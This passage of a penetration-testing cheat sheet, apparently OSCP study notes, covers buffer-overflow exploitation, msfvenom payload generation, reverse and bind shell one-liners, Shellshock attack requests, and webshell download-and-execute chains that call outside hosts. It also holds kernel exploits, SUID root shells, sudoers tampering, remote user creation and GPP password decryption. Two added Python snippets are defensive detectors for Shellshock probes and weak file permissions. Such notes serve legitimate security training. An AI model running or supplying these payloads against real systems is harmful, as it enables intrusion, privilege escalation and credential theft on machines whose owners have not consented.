791. --max-retries 0 -p $x server\_ip\_address; done
792.
793. - WordPress Scan - Wordpress security scanner
794.

795. - wpscan --url $ip/blog --proxy $ip:3129


796.
797. - RSH Enumeration - Unencrypted file transfer system
798.
799. - auxiliary/scanner/rservices/rsh\_login
800.

801. - Finger Enumeration


802.
803. - finger @$ip
804.
805. - finger batman@$ip
806.

807. - TLS & SSL Testing


808.
809. - ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha >
810. OUTPUT-FILE.html
811.

812. - Proxy Enumeration (useful for open proxies)


813.
814. - nikto -useproxy http://$ip:3128 -h $ip
815.
816. - Steganography
817.

818. > apt-get install steghide

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
819. >
820. > steghide extract -sf picture.jpg
821. >
822. > steghide info picture.jpg

823. >
824. > apt-get install stegosuite
825.
826. - The OpenVAS Vulnerability Scanner
827.

828. - apt-get update


829. apt-get install openvas
830. openvas-setup
831.
832. - netstat -tulpn
833.

834. - Login at:


835. https://$ip:9392
836.
Buffer Overflows and Exploits
===================================================================================================================================

- DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)

- Nmap Fuzzers:

  - Nmap Fuzzer List

    [https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html)

  - Nmap HTTP Form Fuzzer

    `nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip`

  - Nmap DNS Fuzzer

    `nmap --script dns-fuzz --script-args timelimit=2h $ip -d`

- MSFvenom

  [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)

- Windows Buffer Overflows

  - Controlling EIP

    ```
    locate pattern_create
    pattern_create.rb -l 2700
    locate pattern_offset
    pattern_offset.rb -q 39694438
    ```

  - Verify exact location of EIP - [*] Exact match at offset 2606

    `buffer = "A" * 2606 + "B" * 4 + "C" * 90`

  - Check for "Bad Characters" - Run multiple times 0x00 - 0xFF

  - Use Mona to determine a module that is unprotected

  - Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP

  - Use NASM to determine the HEX code for a JMP ESP instruction

    ```
    /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
    nasm > JMP ESP
    00000000  FFE4              jmp esp
    ```

  - Run Mona in the Immunity log window to find the JMP ESP opcode (FFE4)

    `!mona find -s "\xff\xe4" -m slmfc.dll`

    found at 0x5f4a358f - Flip around for little endian format

    `buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390`

  - MSFvenom to create payload

    `msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"`

  - Final Payload with NOP slide

    `buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode`

  - Create a PE Reverse Shell

    `msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe`

  - Create a PE Reverse Shell and Encode 9 times with Shikata_ga_nai

    `msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe`

  - Create a PE reverse shell and embed it into an existing executable

    `msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe`

  - Create a PE Reverse HTTPS shell

    `msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe`

- Linux Buffer Overflows

  - Run Evan's Debugger against an app

    `edb --run /usr/games/crossfire/bin/crossfire`

  - ESP register points toward the end of our buffer

    ```
    add eax,12
    jmp eax
    83C00C            add eax,byte +0xc
    FFE0              jmp eax
    ```

  - Check for "Bad Characters" - Process of elimination - Run multiple times 0x00 - 0xFF

  - Find JMP ESP address

    `"\x97\x45\x13\x08" # Found at Address 08134597`

  - `crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"`

  - `msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai`

  - Connect to the shell with netcat:

    `nc -v $ip 4444`
Shells
===================================================================================================================================

- Netcat shell listener:

    `nc -nlvp 4444`

- Spawning a TTY shell - break out of jail or a limited shell.

  You should almost always upgrade your shell after taking control of an apache or www user
  (for example when you encounter the error message `sh: no job control in this shell` when trying to run an exploit).

  (hint: `sudo -l` to see what you can run)

- You may encounter limited shells that use rbash and only allow you to execute a single command per session.
  You can overcome this by executing an SSH shell to your localhost:

    ssh user@$ip nc $localip 4444 -e /bin/sh
    (enter the user's password)
    python -c 'import pty; pty.spawn("/bin/sh")'
    export TERM=linux

- `python -c 'import pty; pty.spawn("/bin/sh")'`

- Python reverse shell:

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

- `echo os.system('/bin/bash')`

- `/bin/sh -i`

- `perl -e 'exec "/bin/sh";'`

- perl: `exec "/bin/sh";`

- ruby: `exec "/bin/sh"`

- lua: `os.execute('/bin/sh')`

- From within IRB: `exec "/bin/sh"`

- From within vi: `:!bash` or `:set shell=/bin/bash:shell`

- From within vim: `:!bash`

- From within nmap: `!sh`

- From within tcpdump:

    echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test
    chmod +x /tmp/.test
    sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

- From busybox: `/bin/busybox telnetd -l /bin/sh -p 9999`

- Pen test monkey PHP reverse shell
  http://pentestmonkey.net/tools/web-shells/php-reverse-shell

- php-findsock-shell - turns PHP port 80 into an interactive shell
  http://pentestmonkey.net/tools/web-shells/php-findsock-shell

- Perl reverse shell
  http://pentestmonkey.net/tools/web-shells/perl-reverse-shell

- PHP powered web browser shell b374k with file upload etc.
  https://github.com/b374k/b374k

- Windows reverse shell - PowerSploit's Invoke-Shellcode script and inject a Meterpreter shell
  https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1

- Web backdoors from Fuzzdb
  https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors

- Creating Meterpreter shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/

*Linux*

`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf`

*Windows*

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe`

*Mac*

`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho`

**Web Payloads**

*PHP*

`msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`

OR

`msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`

Then we need to add `<?php` as the first line of the file so that it will execute as a PHP webpage:

`cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php`

*ASP*

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp`

*JSP*

`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp`

*WAR*

`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war`

**Scripting Payloads**

*Python*

`msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py`

*Bash*

`msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh`

*Perl*

`msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl`

**Shellcode**

For all shellcode see `msfvenom --help-formats` for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

*Linux Based Shellcode*

`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`

*Windows Based Shellcode*

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`

*Mac Based Shellcode*

`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`

**Handlers**

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format:

    use exploit/multi/handler
    set PAYLOAD <Payload name>
    set LHOST <LHOST value>
    set LPORT <LPORT value>
    set ExitOnSession false
    exploit -j -z

Once the required values are completed and saved as a resource file, the following command will execute your handler: `msfconsole -L -r <resource file>`

- SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/

    use auxiliary/scanner/ssh/ssh_login
    use post/multi/manage/shell_to_meterpreter

- Shellshock

- Testing for Shellshock with Nmap:

    root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip

- `git clone https://github.com/nccgroup/shocker`

    ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

- Shellshock SSH forced command

  Check for a forced command by enabling all debug output with ssh:

    ssh -vvv
    ssh -i noob noob@$ip '() { :;}; /bin/bash'

- cat file (view file contents):

    echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () {:;}; echo \$(</etc/passwd)\r\nHost:vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

- Shellshock run bind shell:

    echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost:vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

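Added here as a defensive counterpart to the probes above (example code, not from the original guide): every Shellshock request carries a `() {` function definition in a client-supplied header, so a web-log scan can key on that token. The Apache combined-format log lines are constructed, not real traffic.

```python
import re

# A Shellshock probe places a bash function definition in a client-controlled
# header; "() {" at the start of the value is the token to key on.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache combined log format; the last two quoted fields are Referer and User-Agent.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (not real traffic); lines 1 and 3 mirror the
# HEAD /cgi-bin/status probes from this section.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Sep/2017:13:10:55 -0700] "HEAD /cgi-bin/status HTTP/1.1" 200 - "-" "() {:;}; echo $(</etc/passwd)"
10.0.0.6 - - [25/Sep/2017:13:11:02 -0700] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Sep/2017:13:11:09 -0700] "HEAD /cgi-bin/status HTTP/1.1" 200 - "-" "() { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh"
10.0.0.8 - - [25/Sep/2017:13:11:15 -0700] "GET /cgi-bin/admin.cgi HTTP/1.1" 404 210 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine)"
"""


def find_shellshock(lines):
    """Return (source ip, request line, offending header value) for each probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        # User-Agent and Referer both end up in the CGI environment, so check both.
        for field in ("ua", "ref"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("src"), m.group("req"), m.group(field)))
                break
    return hits


if __name__ == "__main__":
    for src, req, header in find_shellshock(SAMPLE_LOG.splitlines()):
        print(f"{src} {req!r} -> {header!r}")
```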

File Transfers
============================================================================================================

- Post exploitation refers to the actions performed by an attacker once some level of control has been gained on his target.

- Simple local web servers

  - Run a basic HTTP server, great for serving up shells etc:

        python -m SimpleHTTPServer 80

  - Run a basic Python 3 HTTP server, great for serving up shells etc:

        python3 -m http.server

  - Run a Ruby WEBrick basic HTTP server:

        ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"

  - Run a basic PHP HTTP server:

        php -S $ip:80

- Creating a wget VB Script on Windows:
  https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt

- Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic Windows reverse shell and used to transfer files from a web server (the `timeout 1` commands are required after each new line):

    echo Set args = Wscript.Arguments >> webdl.vbs
    timeout 1
    echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
    timeout 1
    echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
    timeout 1
    echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
    timeout 1
    echo xHttp.Open "GET", Url, False >> webdl.vbs
    timeout 1
    echo xHttp.Send >> webdl.vbs
    timeout 1
    echo with bStrm >> webdl.vbs
    timeout 1
    echo .type = 1 ' >> webdl.vbs
    timeout 1
    echo .open >> webdl.vbs
    timeout 1
    echo .write xHttp.responseBody >> webdl.vbs
    timeout 1
    echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
    timeout 1
    echo end with >> webdl.vbs
    timeout 1

  The file can be run using the following syntax:

    `C:\temp\cscript.exe webdl.vbs`

- Mounting file shares

  - Mount an NFS share to /mnt/nfs:

        mount $ip:/vol/share /mnt/nfs

- HTTP PUT:

    nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php'

- Uploading Files
-------------------------------------------------------------------------------------------------------------

- SCP

    scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
    scp localfile username@$ip:~/Folder/
    scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~

- WebDAV with DAVTest - some sysadmins are kind enough to enable the PUT method - this tool will auto upload a backdoor:

    `davtest -move -sendbd auto -url http://$ip`

  https://github.com/cldrn/davtest

  You can also upload a file using the PUT method with the curl command:

    `curl -T 'leetshellz.txt' 'http://$ip'`

  And rename it to an executable file using the MOVE method with the curl command:

    `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`

- Upload a shell using a limited PHP shell cmd - use the webshell to download and execute the meterpreter:

    curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php
    curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php
    curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php

- TFTP

    mkdir /tftp
    atftpd --daemon --port 69 /tftp
    cp /usr/share/windows-binaries/nc.exe /tftp/

  Example from the Windows host:

    C:\Users\Offsec>tftp -i $ip get nc.exe

- FTP

    apt-get update && apt-get install pure-ftpd

    #!/bin/bash
    groupadd ftpgroup
    useradd -g ftpgroup -d /dev/null -s /etc ftpuser
    pure-pw useradd offsec -u ftpuser -d /ftphome
    pure-pw mkdb
    cd /etc/pure-ftpd/auth/
    ln -s ../conf/PureDB 60pdb
    mkdir -p /ftphome
    chown -R ftpuser:ftpgroup /ftphome/
    /etc/init.d/pure-ftpd restart

- Packing Files
-------------------------------------------------------------------------------------------------------------

- Ultimate Packer for eXecutables:

    upx -9 nc.exe

- exe2bat - converts an EXE to a text file that can be copied and pasted:

    locate exe2bat
    wine exe2bat.exe nc.exe nc.txt

- Veil - Evasion Framework - https://github.com/Veil-Framework/Veil-Evasion

    apt-get -y install git
    git clone https://github.com/Veil-Framework/Veil-Evasion.git
    cd Veil-Evasion/
    cd setup
    setup.sh -c

Privilege Escalation
==================================================================================================================

*Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.*

- Linux Privilege Escalation
------------------------------------------------------------------------------------------------------------------------

- The de facto Linux privilege escalation guide - a much more thorough guide for Linux enumeration:
  https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

- Try the obvious - maybe the user can sudo to root:

    `sudo su`

- Here are the commands I have learned to use to perform Linux enumeration and privilege escalation:

  What services are running as root?

    `ps aux | grep root`

  What files run as root / SUID / SGID?

    find / -perm /2000 -user root -type f -print
    find / -perm -1000 -type d 2>/dev/null   # Sticky bit - only the owner of the directory or the owner of a file can delete or rename here.
    find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
    find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
    find / -perm -g=s -o -perm -u=s -type f 2>/dev/null   # SGID or SUID
    for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
    find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

  What folders are world writeable?

    find / -writable -type d 2>/dev/null      # world-writeable folders
    find / -perm -222 -type d 2>/dev/null     # world-writeable folders
    find / -perm -o=w -type d 2>/dev/null     # world-writeable folders
    find / -perm -o=x -type d 2>/dev/null     # world-executable folders
    find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null   # world-writeable & executable folders

- There are a few scripts that can automate the Linux enumeration process:

  - Google is my favorite Linux kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits, which can create a very frustrating blind spot during your OSCP course.

  - LinuxPrivChecker.py - my favorite automated Linux priv enumeration checker:
    https://www.securitysift.com/download/linuxprivchecker.py

  - LinEnum (recently updated):
    https://github.com/rebootuser/LinEnum

  - linux-exploit-suggester (recently updated):
    https://github.com/mzet-/linux-exploit-suggester

  - Highon.coffee Linux local enum - great enumeration script!

    `wget https://highon.coffee/downloads/linux-local-enum.sh`

  - Linux Privilege Exploit Suggester (old, has not been updated in years):
    https://github.com/PenturaLabs/Linux_Exploit_Suggester

  - Linux post exploitation enumeration and exploit checking tools:
    https://github.com/reider-roque/linpostexp

Handy Kernel Exploits

- CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
  https://www.exploit-db.com/exploits/14814/

    wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
    $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
    $ ./i-can-haz-modharden
    [+] launching root shell!
    # id
    uid=0(root) gid=0(root)

- CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
  https://www.exploit-db.com/exploits/15285/

- CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
  https://git.zx2c4.com/CVE-2012-0056/about/

    wget -O exploit.c http://www.exploit-db.com/download/18411
    gcc -o mempodipper exploit.c
    ./mempodipper

- CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
  https://dirtycow.ninja/
  First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016.

- Run a command as a user other than root:

    sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf

- Add a user or change a password:

    /usr/sbin/useradd -p "$(openssl passwd -1 thePassword)" haxzor
    echo thePassword | passwd haxzor --stdin

- Local Privilege Escalation Exploit in Linux

  - **SUID** (**S**et owner **U**ser **ID** up on execution)

    Often SUID C binary files are required to spawn a shell as a superuser; you can update the UID / GID and shell as required. Below are some quick copy and paste examples for various shells.

    SUID C shell for /bin/bash:

        #define _GNU_SOURCE
        #include <stdlib.h>
        #include <unistd.h>

        int main(void){
            setresuid(0, 0, 0);
            system("/bin/bash");
        }

    SUID C shell for /bin/sh:

        #define _GNU_SOURCE
        #include <stdlib.h>
        #include <unistd.h>

        int main(void){
            setresuid(0, 0, 0);
            system("/bin/sh");
        }

    Building the SUID shell binary:

        gcc -o suid suid.c

    For 32 bit:

        gcc -m32 -o suid suid.c

- Create and compile an SUID from a limited shell (no file transfer):

    echo -e "#include <stdlib.h>\n#include <unistd.h>\nint main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" > privsc.c
    gcc privsc.c -o privsc

- Handy command if you can get a root user to run it. Add the www-data user to the root SUDO group with no password requirement:

    `echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update`

- You may find a command is being executed by the root user; you may be able to modify the system PATH environment variable to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on port 4444:

    export PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
    echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
    chmod +x /tmp/ssh

- SearchSploit:

    searchsploit -u
    searchsploit apache 2.2
    searchsploit "Linux Kernel"
    searchsploit linux 2.6 | grep -i ubuntu | grep local
    searchsploit slmail

- Kernel exploit suggestions for kernel version 3.0.0:

    `/usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0`

- Precompiled Linux kernel exploits - ***super handy if GCC is not installed on the target machine!***
  https://www.kernel-exploits.com/

- Collect the root password hash:

    `cat /etc/shadow | grep root`

- Find and display the proof.txt or flag.txt - LOOT!

    cat `find / -name proof.txt -print`

- Windows Privilege Escalation
--------------------------------------------------------------------------------------------------------------------------

- Windows privilege escalation resource:
  http://www.fuzzysecurity.com/tutorials/16.html

- Try the getsystem command using meterpreter - rarely works but is worth a try:

    `meterpreter > getsystem`

- Metasploit Meterpreter privilege escalation guide:
  https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

- Windows Server 2003 and IIS 6.0 WebDAV exploiting:
  http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt

    cadaver http://$ip
    dav:/> put aspshell.txt
    Uploading aspshell.txt to `/aspshell.txt':
    Progress: [=============================>] 100.0% of 38468 bytes succeeded.
    dav:/> copy aspshell.txt aspshell3.asp;.txt
    Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
    dav:/> exit

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 1.2.3.4
    msf exploit(handler) > set LPORT 80
    msf exploit(handler) > set ExitOnSession false
    msf exploit(handler) > exploit -j

    curl http://$ip/aspshell3.asp;.txt

    [*] Started reverse TCP handler on 1.2.3.4:443
    [*] Starting the payload handler...
    [*] Sending stage (957487 bytes) to 1.2.3.5
    [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700

- Windows privilege escalation exploits are often written in Python, so it is necessary to compile them into an executable using pyinstaller.py and upload them to the remote server:

    pip install pyinstaller
    wget -O exploit.py http://www.exploit-db.com/download/31853
    python pyinstaller.py --onefile exploit.py

- Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:
  https://www.exploit-db.com/exploits/6705/
  https://github.com/Re4son/Churrasco

    c:\Inetpub>churrasco
    churrasco
    /churrasco/-->Usage: Churrasco.exe [-d] "command to run"

    c:\Inetpub>churrasco -d "net user /add <username> <password>"
    c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
    c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"

- Windows MS11-080 - http://www.exploit-db.com/exploits/18176/

    python pyinstaller.py --onefile ms11-080.py
    ms11-080.exe -O XP

- PowerShell exploits - you may find that some Windows privilege escalation exploits are written in PowerShell. You may not have an interactive shell that allows you to enter the PowerShell prompt. Once the PowerShell script is uploaded to the server, here is a quick one-liner to run a PowerShell command from a basic (cmd.exe) shell:

  MS16-032 https://www.exploit-db.com/exploits/39719/

    `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"`

- PowerShell priv escalation tools:
  https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

- Windows Run As - switching users in Linux is trivial with the `su` command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.

  - Sysinternals PsExec is a handy tool for running a command on a remote or local server as a specific user, given you have their username and password. The following example creates a reverse shell from a Windows server to our Kali box using netcat for Windows and PsExec (on a 64 bit system):

        C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"

        PsExec v2.2 - Execute processes remotely
        Copyright (C) 2001-2016 Mark Russinovich
        Sysinternals - www.sysinternals.com

  - Runas.exe is a handy Windows tool that allows you to run a program as another user so long as you know their password. The following example creates a reverse shell from a Windows server to our Kali box using netcat for Windows and Runas.exe:

        C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
        Enter the password for Test:
        Attempting to start nc.exe as user "COMPUTERNAME\Test" ...

  - PowerShell can also be used to launch a process as another user. The following simple PowerShell script will run a reverse shell as the specified username and password:

        $username = '<username here>'
        $password = '<password here>'
        $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
        $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
        Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public

    Next run this script using powershell.exe:

        `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"`

- Windows service configuration viewer - check for misconfigurations in services that can lead to privilege escalation. You can replace the executable with your own and have Windows execute whatever code you want as the privileged user:

    icacls scsiaccess.exe

    scsiaccess.exe
    NT AUTHORITY\SYSTEM:(I)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Users:(I)(RX)
    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
    Everyone:(I)(F)

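A defender's version of the icacls check above, added as an example that is not from the original guide: parse `icacls` output and flag service binaries that a low-privilege principal such as Everyone or BUILTIN\Users can overwrite, which is the condition that lets the executable be swapped. The listing is constructed to match the scsiaccess.exe output above; the principal names and rights letters follow icacls' own notation.

```python
import re

# Constructed icacls output mirroring the scsiaccess.exe listing above
# (icacls prints the path on the first ACE line and indents the rest).
ICACLS_OUTPUT = """\
scsiaccess.exe NT AUTHORITY\\SYSTEM:(I)(F)
               BUILTIN\\Administrators:(I)(F)
               BUILTIN\\Users:(I)(RX)
               APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)
               Everyone:(I)(F)
Successfully processed 1 files; Failed processing 0 files
"""

# Principals that any local account is effectively a member of.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
    "application package authority\\all application packages",
}

# Simple and specific rights that allow replacing the file or rewriting its ACL.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "WDAC", "WO"}

# Inheritance flags share the parenthesised notation but are not rights.
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([A-Za-z,]*\))+)$")


def parse_icacls(output):
    """Map each file in icacls output to a list of (principal, set of rights)."""
    files = {}
    current = None
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if not raw.startswith(" "):
            # First ACE line carries the file name; assumes no spaces in the path.
            current, _, line = line.partition(" ")
            files[current] = []
        m = ACE_RE.match(line)
        if m is None or current is None:
            continue
        rights = set()
        for group in re.findall(r"\(([A-Za-z,]*)\)", m.group("rights")):
            if group in INHERITANCE_FLAGS:
                continue
            rights.update(group.split(","))   # e.g. "RX" or "RX,W"
        files[current].append((m.group("principal"), rights))
    return files


def weak_entries(files):
    """Return (file, principal, sorted write rights) where a low-privilege principal can overwrite the file."""
    findings = []
    for path, aces in files.items():
        for principal, rights in aces:
            granted = rights & WRITE_RIGHTS
            if principal.lower() in LOW_PRIV_PRINCIPALS and granted:
                findings.append((path, principal, sorted(granted)))
    return findings


if __name__ == "__main__":
    for path, principal, rights in weak_entries(parse_icacls(ICACLS_OUTPUT)):
        print(f"{path}: {principal} has {','.join(rights)} - binary can be replaced")
```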

- Compile a custom add user command in Windows using C:

    root@kali:~# cat useradd.c
    #include <stdlib.h> /* system, NULL, EXIT_FAILURE */
    int main ()
    {
      int i;
      i=system ("net localgroup administrators low /add");
      return 0;
    }

    i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c

- Group Policy Preferences (GPP)

  A common useful misconfiguration found in modern domain environments is unprotected Windows GPP settings files.

  - Map the domain controller SYSVOL share:

    `net use z: \\dc01\SYSVOL`

  - Find the GPP file Groups.xml:

    `dir /s Groups.xml`

  - Review the contents for passwords:

    `type Groups.xml`

  - Decrypt using gpp-decrypt:

    `gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB`

